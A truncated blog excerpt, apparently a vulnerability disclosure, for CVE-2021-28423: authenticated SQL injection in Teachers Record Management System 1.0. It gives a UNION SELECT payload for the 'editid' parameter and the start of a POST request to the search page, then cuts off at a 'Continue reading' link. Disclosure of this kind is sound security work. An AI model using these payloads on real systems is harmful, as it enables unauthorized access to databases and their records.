# Exploit Author: nhattruong.bloghttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28423https://www.exploit-db.com/exploits/50018https://packetstormsecurity.com/files/163172/Teachers-Record-Management-System-1.0-SQL-Injection.html# Version: 1.0# Tested on: Windows 10 + XAMPP v3.2.4 POC: Go to url http://localhost/admin/index.phpDo loginExecute the payload SQLi #1: The entry point in ‘editid’ GET parameter in edit-subjects-detail.php http://local/admin/edit-subjects-detail.php?editid=-1 union select 1,user(),3– – SQLi #2: The entry point in ‘searchdata’ POST parameter in /admin/search.php POST /admin/search.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (WindowsContinueContinue reading “[CVE-2021-28423] Teachers Record Management System 1.0 – Multiple SQL Injection (Authenticated)”
-
Subscribe
Subscribed
Already have a WordPress.com account? Log in now.
Nhat Truong Blog 